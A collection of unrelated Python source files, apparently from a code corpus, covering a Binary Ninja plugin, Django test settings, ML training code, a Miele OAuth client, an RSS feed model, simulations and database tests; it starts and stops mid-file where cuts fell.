c = Creator(addr, bv)
c.start()
class Creator(BackgroundTaskThread):
def __init__(self, addr, bv):
BackgroundTaskThread.__init__(self, "Creating Signature...", True)
self.addr = addr
self.bv = bv
def run(self):
sigList = get_sig_from_address(self.bv, self.addr)
str_sig = convert_to_string(sigList)
print 'Created Signature:\t' + str_sig
show_message_box("Created Signature",'Address:\t' + convert_to_hex_string(get_address_from_sig(self.bv, sigList)) + '\n' + 'Signature:\t' + str_sig + '\n', MessageBoxButtonSet.OKButtonSet, MessageBoxIcon.InformationIcon)
PluginCommand.register("[SigMaker] Find Signature", "", SigMakerFind)
PluginCommand.register_for_address("[SigMaker] Create Signature", "", SigMakerCreate)
|
1620830
|
import os
DATABASES = {
"default": {
"ENGINE": "django.db.backends.%s" % os.getenv("DB_BACKEND", "sqlite3"),
"NAME": os.getenv("DB_NAME", ":memory:"),
"USER": os.getenv("DB_USER"),
"PASSWORD": os.getenv("DB_PASSWORD"),
"HOST": os.getenv("DB_HOST", ""),
"PORT": os.getenv("DB_PORT", ""),
"TEST": {
"USER": "default_test",
},
},
}
DEFAULT_AUTO_FIELD = "django.db.models.AutoField"
if os.environ.get("DB_BACKEND") in {"mysql", "mariadb"}:
DATABASES["default"]["OPTIONS"] = {
"init_command": "SET GLOBAL sql_mode=(SELECT REPLACE(@@sql_mode,'ONLY_FULL_GROUP_BY',''));" # noqa
}
INSTALLED_APPS = [
# "django.contrib.auth",
# "django.contrib.admin",
# "django.contrib.contenttypes",
# "django.contrib.sessions",
# "django.contrib.staticfiles",
# "django.contrib.messages",
"testapp",
# "tree_queries",
]
MEDIA_ROOT = "/media/"
STATIC_URL = "/static/"
BASEDIR = os.path.dirname(__file__)
MEDIA_ROOT = os.path.join(BASEDIR, "media/")
STATIC_ROOT = os.path.join(BASEDIR, "static/")
SECRET_KEY = "supersikret"
LOGIN_REDIRECT_URL = "/?login=1"
ROOT_URLCONF = "testapp.urls"
LANGUAGES = (("en", "English"), ("de", "German"))
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
|
1620868
|
import os
import argparse
from tqdm import tqdm
from tqdm.notebook import tqdm
from transformers import AdamW
from transformers.optimization import WarmupLinearSchedule
from data_loader import *
def calc_accuracy(X,Y):
max_vals, max_indices = torch.max(X, 1)
train_acc = (max_indices == Y).sum().data.cpu().numpy()/max_indices.size()[0]
return train_acc
def train(train_dataloader, dev_dataloader, model, device, optimizer, loss_fn, epoch):
for e in range(epoch):
train_acc = 0.0
test_acc = 0.0
model.train()
for batch_id, (token_ids, valid_length, segment_ids, label) in enumerate(tqdm(train_dataloader)):
optimizer.zero_grad()
token_ids = token_ids.long().to(device)
segment_ids = segment_ids.long().to(device)
valid_length = valid_length
label = label.long().to(device)
out = model(token_ids, valid_length, segment_ids)
loss = loss_fn(out, label)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
train_acc += calc_accuracy(out, label)
if batch_id % log_interval == 0:
print("epoch {} batch id {} loss {} train acc {}".format(e + 1, batch_id + 1, loss.data.cpu().numpy(),
train_acc / (batch_id + 1)))
print("epoch {} train acc {}".format(e + 1, train_acc / (batch_id + 1)))
model.eval() # 모델 평가 부분
for batch_id, (token_ids, valid_length, segment_ids, label) in enumerate(tqdm(dev_dataloader)):
token_ids = token_ids.long().to(device)
segment_ids = segment_ids.long().to(device)
valid_length = valid_length
label = label.long().to(device)
out = model(token_ids, valid_length, segment_ids)
test_acc += calc_accuracy(out, label)
print("epoch {} test acc {}".format(e + 1, test_acc / (batch_id + 1)))
if not os.path.exists("./result"):
os.mkdir("./result")
torch.save(model.state_dict(), 'result/epoch{}_batch{}.pt'.format(epoch, batch_size))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--batch-size", type=int, default=64, help="default=64")
parser.add_argument("--num-epochs", type=int, default=3, help="default=3")
parser.add_argument("--num-workers", type=int, default=5, help="default=5")
parser.add_argument("--num-classes", type=int, default=4, help="default=5")
args = parser.parse_args()
batch_size = args.batch_size
num_epochs = args.num_epochs
num_workers = args.num_workers
'''
batch_size = 24
num_epochs = 3
num_workers = 1
'''
max_len = 64
warmup_ratio = 0.1
max_grad_norm = 1
log_interval = 200
learning_rate = 5e-5
model = BERTClassifier(num_classes=args.num_classes).build_model()
device = torch.device("cuda:0") if torch.cuda.is_available() else torch.device("cpu")
dtls, _ = preprocessing()
train_dataloader, test_dataloader = data_loader(dtls, max_len, batch_size, num_workers)
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
'weight_decay': 0.01},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate)
loss_fn = nn.CrossEntropyLoss()
t_total = len(train_dataloader) * num_epochs
warmup_step = int(t_total * warmup_ratio)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=warmup_step, t_total=t_total)
train(train_dataloader, test_dataloader, model, device, optimizer, loss_fn, num_epochs)
|
1620873
|
from flask import Flask, render_template
from Models import *
from CharsApi import BB_Chars_API
app = Flask(__name__)
api = BB_Chars_API()
@app.route('/')
def index():
characters = Characters.select()
return render_template('index.html', api=characters)
if __name__ == '__main__':
app.run(host="0.0.0.0")
myDB.close()
|
1620920
|
import numpy as np
from PIL import Image, ImageDraw, ImageFont, ImageMath
from scipy.stats import norm
def draw_curve(fn, draw,rgba=(250,255,0)):
x = 0
eps=1.0
for _ in range(1000):
pt1 = np.array([x,fn(x)])
pt2 = np.array([x+eps,fn(x+eps)])
x=x+eps
draw.line((pt1[0],pt1[1],pt2[0],pt2[1]),fill=rgba,width=1)
|
1620933
|
import functools
import json
import logging
from datetime import timedelta
from requests.exceptions import ConnectionError
from requests_oauthlib import OAuth2Session
_LOGGER = logging.getLogger(__name__)
class MieleClient(object):
DEVICES_URL = "https://api.mcs3.miele.com/v1/devices"
ACTION_URL = "https://api.mcs3.miele.com/v1/devices/{0}/actions"
def __init__(self, hass, session):
self._session = session
self.hass = hass
async def _get_devices_raw(self, lang):
_LOGGER.debug("Requesting Miele device update")
try:
func = functools.partial(
self._session._session.get,
MieleClient.DEVICES_URL,
params={"language": lang},
)
devices = await self.hass.async_add_executor_job(func)
if devices.status_code == 401:
_LOGGER.info("Request unauthorized - attempting token refresh")
if self._session.refresh_token():
return self._get_devices_raw(lang)
if devices.status_code != 200:
_LOGGER.debug(
"Failed to retrieve devices: {}".format(devices.status_code)
)
return None
return devices.json()
except ConnectionError as err:
_LOGGER.error("Failed to retrieve Miele devices: {0}".format(err))
return None
async def get_devices(self, lang="en"):
home_devices = await self._get_devices_raw(lang)
if home_devices is None:
return None
result = []
for home_device in home_devices:
result.append(home_devices[home_device])
return result
def get_device(self, device_id, lang="en"):
devices = self._get_devices_raw(lang)
if devices is None:
return None
if devices is not None:
return devices[device_id]
return None
async def action(self, device_id, body):
_LOGGER.debug("Executing device action for {}{}".format(device_id, body))
try:
headers = {"Content-Type": "application/json"}
func = functools.partial(
self._session._session.put,
MieleClient.ACTION_URL.format(device_id),
data=json.dumps(body),
headers=headers,
)
result = await self.hass.async_add_executor_job(func)
if result.status_code == 401:
_LOGGER.info("Request unauthorized - attempting token refresh")
if self._session.refresh_token():
return self.action(device_id, body)
if result.status_code == 200:
return result.json()
elif result.status_code == 204:
return None
else:
_LOGGER.error(
"Failed to execute device action for {}: {} {}".format(
device_id, result.status_code, result.json()
)
)
return None
except ConnectionError as err:
_LOGGER.error("Failed to execute device action: {}".format(err))
return None
class MieleOAuth(object):
"""
Implements Authorization Code Flow for Miele@home implementation.
"""
OAUTH_AUTHORIZE_URL = "https://api.mcs3.miele.com/thirdparty/login"
OAUTH_TOKEN_URL = "https://api.mcs3.miele.com/thirdparty/token"
def __init__(self, client_id, client_secret, redirect_uri, cache_path=None):
self._client_id = client_id
self._client_secret = client_secret
self._cache_path = cache_path
self._token = self._get_cached_token()
self._extra = {
"client_id": self._client_id,
"client_secret": self._client_secret,
}
self._session = OAuth2Session(
self._client_id,
auto_refresh_url=MieleOAuth.OAUTH_TOKEN_URL,
redirect_uri=redirect_uri,
token=self._token,
token_updater=self._save_token,
auto_refresh_kwargs=self._extra,
)
if self.authorized:
self.refresh_token()
@property
def authorized(self):
return self._session.authorized
@property
def authorization_url(self):
return self._session.authorization_url(
MieleOAuth.OAUTH_AUTHORIZE_URL, state="login"
)[0]
def get_access_token(self, client_code):
token = self._session.fetch_token(
MieleOAuth.OAUTH_TOKEN_URL,
code=client_code,
include_client_id=True,
client_secret=self._client_secret,
)
self._save_token(token)
return token
async def refresh_token(self):
body = "client_id={}&client_secret={}&".format(
self._client_id, self._client_secret
)
self._token = await self._session.refresh_token(
MieleOAuth.OAUTH_TOKEN_URL,
body=body,
refresh_token=self._token["refresh_token"],
)
self._save_token(self._token)
def _get_cached_token(self):
token = None
if self._cache_path:
try:
f = open(self._cache_path)
token_info_string = f.read()
f.close()
token = json.loads(token_info_string)
except IOError:
pass
return token
def _save_token(self, token):
_LOGGER.debug("trying to save new token")
if self._cache_path:
try:
f = open(self._cache_path, "w")
f.write(json.dumps(token))
f.close()
except IOError:
_LOGGER._warn(
"Couldn't write token cache to {0}".format(self._cache_path)
)
pass
self._token = token
|
1620947
|
import torch
from torch.autograd import Variable
import torch.nn.functional as F
def one_hot_embedding(labels, num_classes):
'''
Embedding labels to one-hot form.
Args:
labels: (LongTensor) class labels, sized [N,].
num_classes: (int) number of classes.
Returns:
(tensor) encoded labels, sized [N,#classes].
'''
y = torch.eye(num_classes)
return y[labels]
def focal_loss(x, y):
'''
Focal loss.
Args:
x: (tensor) sized [N,D].
y: (tensor) sized [N,].
Return:
(tensor) focal loss.
'''
alpha = 0.25
gamma = 2
t = one_hot_embedding(y, x.shape[1] + 1)
# exclude background
t = t[:, 1:]
t = Variable(t).cuda()
p = x.sigmoid().float()
# pt = p if t > 0 else 1-p
pt = p * t + (1 - p) * (1 - t)
# w = alpha if t > 0 else 1-alpha
w = alpha * t + (1 - alpha) * (1 - t)
w = w * (1 - pt).pow(gamma)
return F.binary_cross_entropy_with_logits(x.float(), t, w.detach(), size_average=True)
|
1620978
|
import typing
from collections import namedtuple
from django.utils import timezone
from django.db import transaction
from functools import cached_property
from rssant_common.validator import FeedUnionId
from rssant_common.detail import Detail
from rssant_config import MAX_FEED_COUNT
from rssant_feedlib import FeedResponseStatus
from .errors import FeedExistError, FeedStoryOffsetError, FeedNotFoundError
from .feed import (
UserFeed, Feed, FeedStatus, FeedDetailSchema,
FEED_DETAIL_FIELDS, USER_FEED_DETAIL_FIELDS,
)
from .feed_creation import FeedCreation, FeedCreateResult, FeedUrlMap
FeedImportItem = namedtuple('FeedImportItem', 'url, title, group')
class UnionFeed:
def __init__(self, feed, user_feed, detail=False):
self._feed = feed
self._user_feed = user_feed
self._detail = detail
@cached_property
def id(self):
return FeedUnionId(self._user_feed.user_id, self._feed.id)
@property
def user_id(self):
return self._user_feed.user_id
@property
def status(self):
return self._feed.status
@property
def is_ready(self):
return bool(self.status and self.status == FeedStatus.READY)
@property
def url(self):
return self._feed.url
@property
def title(self):
if self._user_feed.title:
return self._user_feed.title
return self._feed.title
@property
def origin_title(self):
return self._feed.title
@property
def group(self):
return self._user_feed.group
@property
def link(self):
return self._feed.link
@property
def author(self):
return self._feed.author
@property
def icon(self):
return self._feed.icon
@property
def version(self):
return self._feed.version
@property
def total_storys(self):
return self._feed.total_storys
@property
def story_offset(self):
return self._user_feed.story_offset
@property
def num_unread_storys(self):
return self._feed.total_storys - self._user_feed.story_offset
@staticmethod
def _union_dt_updated(dt_1, dt_2):
if dt_1 and dt_2:
return max(dt_1, dt_2)
else:
return dt_1 or dt_2
@property
def dt_updated(self):
return self._union_dt_updated(
self._user_feed.dt_updated, self._feed.dt_updated)
@property
def dt_created(self):
if self._user_feed.dt_created:
return self._user_feed.dt_created
return self._feed.dt_created
@property
def dryness(self):
return self._feed.dryness
@property
def freeze_level(self):
return self._feed.freeze_level
@property
def use_proxy(self):
return self._feed.use_proxy
@property
def dt_first_story_published(self):
return self._feed.dt_first_story_published
@property
def dt_latest_story_published(self):
return self._feed.dt_latest_story_published
@property
def description(self):
return self._feed.description
@property
def warnings(self) -> str:
return self._feed.warnings
@property
def encoding(self):
return self._feed.encoding
@property
def etag(self):
return self._feed.etag
@property
def last_modified(self):
return self._feed.last_modified
@property
def response_status(self) -> int:
return self._feed.response_status
@property
def response_status_name(self) -> str:
if self.response_status is None:
return None
return FeedResponseStatus.name_of(self.response_status)
@property
def content_length(self):
return self._feed.content_length
@property
def content_hash_base64(self):
return self._feed.content_hash_base64
@property
def dt_checked(self):
return self._feed.dt_checked
@property
def dt_synced(self):
return self._feed.dt_synced
def to_dict(self):
ret = dict(
id=self.id,
user=dict(id=self.user_id),
is_ready=self.is_ready,
status=self.status,
url=self.url,
total_storys=self.total_storys,
story_offset=self.story_offset,
num_unread_storys=self.num_unread_storys,
dt_updated=self.dt_updated,
dt_created=self.dt_created,
)
detail = Detail.from_schema(self._detail, FeedDetailSchema)
for k in detail.include_fields:
ret[k] = getattr(self, k)
if self._detail:
ret['response_status_name'] = self.response_status_name
return ret
@staticmethod
def get_by_id(feed_unionid, detail=False):
user_id, feed_id = feed_unionid
q = UserFeed.objects.select_related('feed').seal()
q = q.filter(user_id=user_id, feed_id=feed_id)
if not detail:
q = q.defer(*USER_FEED_DETAIL_FIELDS)
try:
user_feed = q.get()
except UserFeed.DoesNotExist as ex:
raise FeedNotFoundError(str(ex)) from ex
return UnionFeed(user_feed.feed, user_feed, detail=detail)
@staticmethod
def bulk_delete(feed_ids):
return Feed.objects.filter(id__in=list(feed_ids)).delete()
@staticmethod
def _merge_user_feeds(user_feeds, detail=False):
def sort_union_feeds(x):
return (bool(x.dt_updated), x.dt_updated, x.id)
union_feeds = []
for user_feed in user_feeds:
union_feeds.append(UnionFeed(user_feed.feed, user_feed, detail=detail))
return list(sorted(union_feeds, key=sort_union_feeds, reverse=True))
@staticmethod
def query_by_user(user_id, hints=None, detail=False):
"""获取用户所有的订阅,支持增量查询
hints: T.list(T.dict(id=T.unionid, dt_updated=T.datetime))
"""
detail = Detail.from_schema(detail, FeedDetailSchema)
exclude_fields = [f'feed__{x}' for x in detail.exclude_fields]
if not hints:
q = UserFeed.objects.select_related('feed').filter(user_id=user_id)
q = q.defer(*exclude_fields)
union_feeds = UnionFeed._merge_user_feeds(list(q.all()), detail=detail)
return len(union_feeds), union_feeds, []
hints = {x['id'].feed_id: x['dt_updated'] for x in hints}
q = UserFeed.objects.filter(user_id=user_id).select_related('feed')
q = q.only("id", 'feed_id', 'dt_updated', 'feed__dt_updated')
user_feeds = list(q[:MAX_FEED_COUNT])
total = len(user_feeds)
feed_ids = {user_feed.feed_id for user_feed in user_feeds}
deteted_ids = []
for feed_id in set(hints) - feed_ids:
deteted_ids.append(FeedUnionId(user_id, feed_id))
updates = []
for user_feed in user_feeds:
feed_id = user_feed.feed_id
dt_updated = UnionFeed._union_dt_updated(
user_feed.dt_updated, user_feed.feed.dt_updated)
if feed_id not in hints or not dt_updated:
updates.append(feed_id)
elif dt_updated > hints[feed_id]:
updates.append(feed_id)
q = UserFeed.objects.select_related('feed')\
.filter(user_id=user_id, feed_id__in=updates)
q = q.defer(*exclude_fields)
union_feeds = UnionFeed._merge_user_feeds(list(q.all()), detail=detail)
return total, union_feeds, deteted_ids
@staticmethod
def delete_by_id(feed_unionid):
user_id, feed_id = feed_unionid
try:
user_feed = UserFeed.objects.only('id').get(user_id=user_id, feed_id=feed_id)
except UserFeed.DoesNotExist as ex:
raise FeedNotFoundError(str(ex)) from ex
user_feed.delete()
@staticmethod
def set_story_offset(feed_unionid, offset):
"""更新故事阅读位置,注意offset只增不减,较小的offset会被忽略"""
union_feed = UnionFeed.get_by_id(feed_unionid)
if not offset:
offset = union_feed.total_storys
if offset > union_feed.total_storys:
raise FeedStoryOffsetError('offset too large')
# only update if story not readed
if offset > union_feed.story_offset:
user_feed = union_feed._user_feed
user_feed.story_offset
user_feed.story_offset = offset
user_feed.dt_updated = timezone.now()
user_feed.save()
return union_feed
@classmethod
def set_title(cls, feed_unionid, title):
return cls._set_fields(feed_unionid, title=title)
@classmethod
def set_group(cls, feed_unionid, group):
return cls._set_fields(feed_unionid, group=group)
@staticmethod
def _set_fields(feed_unionid, **fields):
union_feed = UnionFeed.get_by_id(feed_unionid)
user_feed = union_feed._user_feed
for key, value in fields.items():
setattr(user_feed, key, value)
user_feed.dt_updated = timezone.now()
user_feed.save()
return union_feed
@staticmethod
def set_all_group(user_id: int, feed_ids: list, *, group: str) -> int:
q = UserFeed.objects.filter(user_id=user_id).filter(feed_id__in=feed_ids)
return q.update(
group=group,
dt_updated=timezone.now(),
)
@staticmethod
def set_all_readed_by_user(user_id, ids=None) -> int:
if ids is not None and not ids:
return 0
q = UserFeed.objects.select_related('feed').filter(user_id=user_id)
feed_ids = [x.feed_id for x in ids]
if ids is not None:
q = q.filter(feed_id__in=feed_ids)
q = q.only('_version', 'id', 'story_offset', 'feed_id', 'feed__total_storys')
updates = []
now = timezone.now()
for user_feed in q.all():
num_unread = user_feed.feed.total_storys - user_feed.story_offset
if num_unread > 0:
user_feed.story_offset = user_feed.feed.total_storys
user_feed.dt_updated = now
updates.append(user_feed)
with transaction.atomic():
for user_feed in updates:
user_feed.save()
return len(updates)
@staticmethod
def delete_all(user_id, ids=None) -> int:
if ids is not None and not ids:
return 0
q = UserFeed.objects.select_related('feed').filter(user_id=user_id)
if ids is not None:
feed_ids = [x.feed_id for x in ids]
q = q.filter(feed_id__in=feed_ids)
q = q.only('_version', 'id')
num_deleted, details = q.delete()
return num_deleted
@staticmethod
def create_by_url(*, user_id, url):
feed = None
target = FeedUrlMap.find_target(url)
if target and target != FeedUrlMap.NOT_FOUND:
feed = Feed.objects.filter(url=target).first()
if feed:
user_feed = UserFeed.objects.filter(user_id=user_id, feed=feed).first()
if user_feed:
raise FeedExistError('already exists')
user_feed = UserFeed(user_id=user_id, feed=feed)
feed.unfreeze()
user_feed.save()
return UnionFeed(feed, user_feed), None
else:
feed_creation = FeedCreation(user_id=user_id, url=url)
feed_creation.save()
return None, feed_creation
@staticmethod
def create_by_imports(
*,
user_id: int,
imports: typing.List[FeedImportItem],
batch_size: int = 500,
is_from_bookmark: bool = False,
) -> FeedCreateResult:
# 批量预查询,减少SQL查询数量,显著提高性能
if not imports:
return FeedCreateResult.empty()
import_map = {x.url: x for x in imports}
urls = set(import_map.keys())
url_map = {}
for url, target in FeedUrlMap.find_all_target(urls).items():
if target == FeedUrlMap.NOT_FOUND:
urls.discard(url)
else:
url_map[url] = target
# url not existed in url_map: url_map outdated or new url
for url in (urls - set(url_map.keys())):
url_map[url] = url
rev_url_map = {v: k for k, v in url_map.items()}
found_feeds = list(
Feed.objects.seal()
.filter(url__in=set(url_map.values()))
.defer(*FEED_DETAIL_FIELDS).all()
)
feed_id_map = {x.id: x for x in found_feeds}
feed_map = {x.url: x for x in found_feeds}
q = UserFeed.objects.filter(user_id=user_id, feed__in=found_feeds).all()
user_feed_map = {x.feed_id: x for x in q.all()}
for x in user_feed_map.values():
x.feed = feed_id_map[x.feed_id]
# 多个url匹配到同一个feed的情况,user_feed只能保存一个,要根据feed_id去重
new_user_feed_ids = set()
new_user_feeds = []
feed_creations = []
unfreeze_feed_ids = set()
for url in urls:
feed = feed_map.get(url_map.get(url))
if feed:
if feed.id in user_feed_map:
continue
new_user_feed_ids.add(feed.id)
if feed.freeze_level and feed.freeze_level > 1:
unfreeze_feed_ids.add(feed.id)
else:
import_item = import_map.get(url)
feed_creation = FeedCreation(
user_id=user_id, url=url,
title=import_item.title if import_item else None,
group=import_item.group if import_item else None,
is_from_bookmark=is_from_bookmark,
)
feed_creations.append(feed_creation)
new_user_feeds = []
for feed_id in new_user_feed_ids:
feed = feed_id_map[feed_id]
import_item = import_map.get(rev_url_map.get(feed.url))
# only set UserFeed.title when import title not equal feed title
title = None
if import_item and import_item.title and import_item.title != feed.title:
title = import_item.title
user_feed = UserFeed(
user_id=user_id, feed=feed,
title=title,
group=import_item.group if import_item else None,
)
new_user_feeds.append(user_feed)
# 尽量确保用户订阅数不超过限制
user_feed_count = UserFeed.objects.filter(user_id=user_id).count()
user_feed_creation_count = FeedCreation.objects.filter(user_id=user_id).count()
user_total_feed = user_feed_count + user_feed_creation_count
free_count = max(0, MAX_FEED_COUNT - user_total_feed)
new_user_feeds = new_user_feeds[:free_count]
free_count = max(0, free_count - len(new_user_feeds))
feed_creations = feed_creations[:free_count]
# 执行写入数据
UserFeed.objects.bulk_create(new_user_feeds, batch_size=batch_size)
FeedCreation.objects.bulk_create(feed_creations, batch_size=batch_size)
if unfreeze_feed_ids:
Feed.objects.filter(pk__in=unfreeze_feed_ids).update(freeze_level=1)
existed_feeds = UnionFeed._merge_user_feeds(user_feed_map.values())
union_feeds = UnionFeed._merge_user_feeds(new_user_feeds)
return FeedCreateResult(
created_feeds=union_feeds,
existed_feeds=existed_feeds,
feed_creations=feed_creations,
)
|
1620990
|
if __name__ == "__main__":
#import cProfile, pstats, io
#pr = cProfile.Profile()
#pr.enable()
import sys
init_modules = set(sys.modules.keys())
while True:
from core import repl
from core.error import ReloadException, QuitException
try:
repl.Repl().run(True)
except ReloadException:
for m in reversed(list(sys.modules.keys())):
if m not in init_modules:
del sys.modules[m]
continue
except QuitException:
#pr.disable()
#s = io.StringIO()
#sortby = pstats.SortKey.CUMULATIVE
#ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
#ps.print_stats()
#with open ('stats.txt','w') as file:
#file.write(s.getvalue())
break
|
1620996
|
import numpy as np
import matplotlib as mpl
mpl.use("Agg")
import matplotlib.pyplot as plt
import dolfin as df
from finmag import Simulation
from finmag.energies import Exchange, DMI, Demag, Zeeman, UniaxialAnisotropy
from finmag.energies.zeeman import TimeZeemanPython
import matplotlib.pyplot as plt
from finmag.util.fileio import Tablereader
mesh = df.Mesh('mesh_a3cc0220d03c921e8cfa9ecf5da5fc74.xml.gz')
def relax_system():
Ms = 8.6e5
sim = Simulation(mesh, Ms, unit_length=1e-9, name = 'dy')
sim.alpha = 0.001
sim.set_m(np.load('m_000088.npy'))
#sim.set_tol(1e-6, 1e-6)
A = 1.3e-11
sim.add(Exchange(A))
parameters = {
'absolute_tolerance': 1e-10,
'relative_tolerance': 1e-10,
'maximum_iterations': int(1e5)
}
demag = Demag()
demag.parameters['phi_1'] = parameters
demag.parameters['phi_2'] = parameters
print demag.parameters
sim.add(demag)
sim.schedule('save_ndt', every=2e-12)
sim.schedule('save_vtk', every=2e-12, filename='vtks/m.pvd')
sim.schedule('save_m', every=2e-12, filename='npys/m.pvd')
sim.run_until(1e-9)
def plot_mx(filename='dy.ndt'):
data = Tablereader(filename)
ts=data['time']/1e-9
fig=plt.figure()
plt.plot(ts, data['E_total'], label='Total')
#plt.plot(ts, data['E_Demag'], label='Demag')
#plt.plot(ts, data['E_Exchange'], label='Exchange')
plt.xlabel('time (ns)')
plt.ylabel('energy')
plt.legend()
fig.savefig('energy.pdf')
if __name__ == '__main__':
#relax()
#relax_system()
plot_mx()
|
1621009
|
import time
from bot_python_sdk.bot_service import BoTService
from bot_python_sdk.device_status import DeviceStatus
from bot_python_sdk.configuration_store import ConfigurationStore
from bot_python_sdk.logger import Logger
LOCATION = 'Pairing Service'
RESOURCE = 'pair'
POLLING_INTERVAL_IN_SECONDS = 10
MAXIMUM_TRIES = 10
class PairingService:
def __init__(self):
configuration = ConfigurationStore().get()
self.maker_id = configuration.get_maker_id()
self.device_id = configuration.get_device_id()
self.device_status = configuration.get_device_status()
self.bot_service = BoTService()
def run(self):
if not self.can_pair:
return
if self.device_status == DeviceStatus.MULTIPAIR:
Logger.info(LOCATION, 'Multipair mode, no need to poll or delete keys...')
return
Logger.info(LOCATION, 'Starting to pair device...')
for tries in range(1, MAXIMUM_TRIES + 1):
Logger.info(LOCATION, 'Pairing device, attempt: ' + str(tries))
if self.pair():
return True
time.sleep(POLLING_INTERVAL_IN_SECONDS)
return False
def can_pair(self):
return self.device_status == DeviceStatus.MULTIPAIR or self.device_status == DeviceStatus.NEW
def pair(self):
try:
response = self.bot_service.get(RESOURCE)
Logger.info(LOCATION, 'Pairing Response: ' + str(response))
# TODO : Make exception more specific
except:
Logger.error(LOCATION, 'Failed pairing attempt.')
return False
if response['status'] is True:
Logger.success(LOCATION, 'Device successfully paired.')
return True
else:
Logger.error(LOCATION, 'Failed pairing attempt.')
return False
|
1621022
|
import os.path
import pytest
from testsuite.databases.pgsql import discover
SQLDATA_PATH = os.path.join(
os.path.dirname(__file__), 'static/postgresql/schemas',
)
MIGRATIONS = os.path.join(
os.path.dirname(__file__), 'static/postgresql/migrations',
)
@pytest.fixture(scope='session')
def pgsql_local(pgsql_local_create):
databases = discover.find_databases('service', SQLDATA_PATH, MIGRATIONS)
assert sorted(databases) == [
'foo',
'multidir',
'pgmigrate',
'pgmigrate_sharded',
]
assert databases['foo'].dbname == 'foo'
assert len(databases['foo'].shards) == 2
assert databases['foo'].shards[0].dbname == 'service_foo_0'
assert databases['foo'].shards[1].dbname == 'service_foo_1'
return pgsql_local_create(list(databases.values()))
def test_shards(pgsql):
for shard_id, dbname in enumerate(['foo@0', 'foo@1']):
cursor = pgsql[dbname].cursor()
cursor.execute('SELECT value from foo')
result = list(row[0] for row in cursor)
cursor.close()
assert result == ['This is shard %d' % shard_id]
@pytest.mark.pgsql('foo@0', queries=['INSERT INTO foo VALUES (\'mark0\')'])
@pytest.mark.pgsql('foo@1', queries=['INSERT INTO foo VALUES (\'mark1\')'])
def test_pgsql_mark_queries(pgsql):
for shard_id, dbname in enumerate(['foo@0', 'foo@1']):
cursor = pgsql[dbname].cursor()
cursor.execute('SELECT value from foo')
result = list(row[0] for row in cursor)
cursor.close()
assert result == ['mark%d' % shard_id]
@pytest.mark.pgsql('foo@0', files=['custom_foo@0.sql'])
@pytest.mark.pgsql('foo@1', directories=['custom_foo@1'])
def test_pgsql_mark_files(pgsql):
for shard_id, dbname in enumerate(['foo@0', 'foo@1']):
cursor = pgsql[dbname].cursor()
cursor.execute('SELECT value from foo')
result = list(row[0] for row in cursor)
cursor.close()
assert result == ['custom%d' % shard_id]
def test_multidir_schema(pgsql):
cursor = pgsql['multidir'].cursor()
cursor.execute('SELECT value from multidir1')
result = sorted(row[0] for row in cursor)
assert result == ['first', 'second']
cursor = pgsql['multidir'].cursor()
cursor.execute('SELECT value from multidir2')
result = sorted(row[0] for row in cursor)
assert result == []
def test_migrations(pgsql):
cursor = pgsql['pgmigrate'].cursor()
cursor.execute('SELECT value from migrations')
result = list(row[0] for row in cursor)
assert result == []
def test_migrations_shards(pgsql):
cursor = pgsql['pgmigrate_sharded@0'].cursor()
cursor.execute('SELECT value0 from migrations')
result = list(row[0] for row in cursor)
assert result == []
cursor = pgsql['pgmigrate_sharded@1'].cursor()
cursor.execute('SELECT value1 from migrations')
result = list(row[0] for row in cursor)
assert result == []
|
1621026
|
import torch as th
import torch.nn as nn
import torch.nn.functional as F
class NoiseRNNAgent(nn.Module):
def __init__(self, input_shape, args):
super(NoiseRNNAgent, self).__init__()
self.args = args
self.fc1 = nn.Linear(input_shape, args.rnn_hidden_dim)
self.rnn = nn.GRUCell(args.rnn_hidden_dim, args.rnn_hidden_dim)
self.fc2 = nn.Linear(args.rnn_hidden_dim, args.n_actions)
self.noise_fc1 = nn.Linear(args.noise_dim + args.n_agents, args.noise_embedding_dim)
self.noise_fc2 = nn.Linear(args.noise_embedding_dim, args.noise_embedding_dim)
self.noise_fc3 = nn.Linear(args.noise_embedding_dim, args.n_actions)
self.hyper = True
self.hyper_noise_fc1 = nn.Linear(args.noise_dim + args.n_agents, args.rnn_hidden_dim * args.n_actions)
def init_hidden(self):
# make hidden states on same device as model
return self.fc1.weight.new(1, self.args.rnn_hidden_dim).zero_()
def forward(self, inputs, hidden_state, noise):
agent_ids = th.eye(self.args.n_agents, device=inputs.device).repeat(noise.shape[0], 1)
noise_repeated = noise.repeat(1, self.args.n_agents).reshape(agent_ids.shape[0], -1)
x = F.relu(self.fc1(inputs))
h_in = hidden_state.reshape(-1, self.args.rnn_hidden_dim)
h = self.rnn(x, h_in)
q = self.fc2(h)
noise_input = th.cat([noise_repeated, agent_ids], dim=-1)
if self.hyper:
W = self.hyper_noise_fc1(noise_input).reshape(-1, self.args.n_actions, self.args.rnn_hidden_dim)
wq = th.bmm(W, h.unsqueeze(2))
else:
z = F.tanh(self.noise_fc1(noise_input))
z = F.tanh(self.noise_fc2(z))
wz = self.noise_fc3(z)
wq = q * wz
return wq, h
|
1621047
|
n = int(input())
a = list(map(int, input().split()))
m = int(input())
b = list(map(int, input().split()))
c = 0
a.sort()
b.sort()
r1 = a if len(a)>len(b) else b
r2 = a if len(a)<len(b) else b
for i in range(min(n,m)):
if r1[i]!=r2[i]:
if r2[i] not in r1:
c = c+1
elif r1[i] not in r2:
